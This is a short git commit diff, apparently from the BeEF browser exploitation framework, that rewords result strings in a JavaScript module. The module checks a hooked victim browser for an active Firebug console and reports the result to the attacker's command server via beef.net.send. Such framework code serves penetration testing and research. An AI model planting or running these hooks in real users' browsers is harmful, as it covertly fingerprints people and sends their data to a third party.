Re-categorized some modules

Fixed a couple of typos
This commit is contained in:
bcoles
2012-04-27 10:35:17 +09:30
parent d3005850d7
commit 75cf67a6c4
51 changed files with 20 additions and 20 deletions

View File

@@ -14,8 +14,8 @@
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});